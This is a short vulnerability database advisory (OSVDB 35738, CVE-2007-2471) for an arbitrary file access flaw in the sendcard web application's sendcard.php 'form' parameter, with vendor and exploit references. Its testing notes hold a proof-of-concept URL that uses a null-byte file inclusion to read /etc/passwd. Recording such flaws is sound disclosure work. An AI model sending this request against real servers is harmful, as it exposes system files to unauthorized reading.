sendcard sendcard.php form Variable Arbitrary File Access

2007-05-01T06:33:58
ID OSVDB:35738
Type osvdb
Reporter OSVDB
Modified 2007-05-01T06:33:58

Description

Manual Testing Notes

http://[target]/[path]/sendcard.php?form=/etc/passwd%00

References:

Vendor URL: http://www.sendcard.org/ Secunia Advisory ID:25085 Related OSVDB ID: 35739 Related OSVDB ID: 35740 Related OSVDB ID: 35741 ISS X-Force ID: 33995 Generic Exploit URL: http://milw0rm.com/exploits/3827 CVE-2007-2471